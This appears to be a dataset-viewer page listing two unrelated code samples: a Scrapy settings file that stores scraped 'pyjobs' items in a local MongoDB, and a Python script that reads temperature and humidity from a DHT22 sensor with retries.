SPIDER_MODULES = ['pyjobs.spiders']
NEWSPIDER_MODULE = 'pyjobs.spiders'
ITEM_PIPELINES = {
'scrapy_mongodb.MongoDBPipeline': 0,
}
# Config MongoDB
MONGODB_URI = 'mongodb://localhost:27017'
MONGODB_DATABASE = 'pyjobs'
MONGODB_COLLECTION = 'jobs'
MONGODB_UNIQUE_KEY = 'uid'
|
#!/usr/bin/env python3
import sys
from time import sleep
import adafruit_dht
import board
dhtDevice = adafruit_dht.DHT22(board.D4)
max_number_of_reads = 50 # max reads attempted before exit(1)
good_reads_required = 2 # take the n-th successful read and stop trying
pause_between_reads = 3 # in seconds
f_val = ""
good_reads = 0
for i in range(max_number_of_reads):
try:
f_val = "{0:0.1f} {1:0.1f}".format(dhtDevice.temperature, dhtDevice.humidity)
print("measure {}: {}".format(i + 1, f_val), file=sys.stderr)
good_reads += 1
if good_reads >= good_reads_required:
print(f_val)
sys.exit()
except RuntimeError as error:
# Errors happen fairly often, DHT's are hard to read, just keep going
print("measure {}: {}".format(i + 1, error.args[0]), file=sys.stderr)
sleep(pause_between_reads)
sys.exit(1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.